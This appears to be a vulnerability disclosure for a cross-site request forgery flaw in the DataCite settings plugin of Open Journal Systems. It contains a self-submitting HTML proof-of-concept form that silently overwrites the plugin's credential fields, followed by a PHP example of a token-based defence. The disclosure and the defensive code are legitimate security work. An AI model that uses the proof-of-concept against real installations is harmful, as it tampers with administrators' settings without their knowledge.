Cross-Site Request Forgery (CSRF) in pkp/ojs
Valid
Reported on Oct 16th 2021
Description
No CSRF token in DataCite save settings plugin (OJS only)
POC
````html
<html>
<body>
<form action="http://10.0.2.15:8000/index.php/e/$$$call$$$/grid/settings/plugins/settings-plugin-grid/manage?plugin=DataciteExportPlugin&category=importexport&verb=save" method="POST">
<input type="hidden" name="username" value="" />
<input type="hidden" name="password" value="" />
<input type="hidden" name="testUsername" value="" />
<input type="hidden" name="testPassword" value="" />
<input type="hidden" name="testDOIPrefix" value="" />
<input type="hidden" name="submitFormButton" value="" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
````
# Impact
This vulnerability can be used to trick admins into changing settings for the OJS DataCite plugin.
Occurrences
We have contacted a member of the pkp/ojs team and are waiting to hear back
haxatron modified the report
SettingsPluginGridHandler.inc.php#L21L102 has been validated
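
One way a settings-save handler can reject the forged POST shown in the POC, as an added example (not code from the original report or from OJS). The function names, the `csrfToken` field name and the session array are assumptions made for illustration; the sample values are constructed.

```php
<?php
// Added example: synchronizer-token check for a state-changing settings request.
// All names here (issueCsrfToken, handleSave, csrfToken) are hypothetical, not OJS APIs.

// Create one random token per session and return it for embedding in the form.
function issueCsrfToken(array &$session): string {
    if (empty($session['csrfToken'])) {
        $session['csrfToken'] = bin2hex(random_bytes(32));
    }
    return $session['csrfToken'];
}

// True only when the request carries the token bound to this session.
function hasValidCsrfToken(array $session, array $post): bool {
    $expected = $session['csrfToken'] ?? '';
    $supplied = $post['csrfToken'] ?? '';
    return is_string($supplied) && $expected !== ''
        && hash_equals($expected, $supplied); // constant-time comparison
}

// Save handler: verify method and token before touching any setting.
function handleSave(string $method, array $session, array $post, array &$settings): int {
    if ($method !== 'POST' || !hasValidCsrfToken($session, $post)) {
        return 403; // reject; settings stay unchanged
    }
    foreach (['username', 'password', 'testUsername', 'testPassword', 'testDOIPrefix'] as $key) {
        if (isset($post[$key]) && is_string($post[$key])) {
            $settings[$key] = $post[$key];
        }
    }
    return 200;
}

// Constructed sample data: an admin session and existing plugin settings.
$session = [];
$token = issueCsrfToken($session);
$settings = ['username' => 'datacite-user', 'password' => 'example-only'];

// Cross-site form post with the POC's fields: the other origin cannot read the token.
$forged = ['username' => '', 'password' => '', 'testUsername' => '',
           'testPassword' => '', 'testDOIPrefix' => '', 'submitFormButton' => ''];
echo handleSave('POST', $session, $forged, $settings), "\n";

// Same-origin form rendered by the application includes the session token.
$legit = ['username' => 'new-user', 'csrfToken' => $token];
echo handleSave('POST', $session, $legit, $settings), "\n";
echo $settings['username'], "\n";
```

The forged request is refused before any setting is written, while the request carrying the session's token is applied.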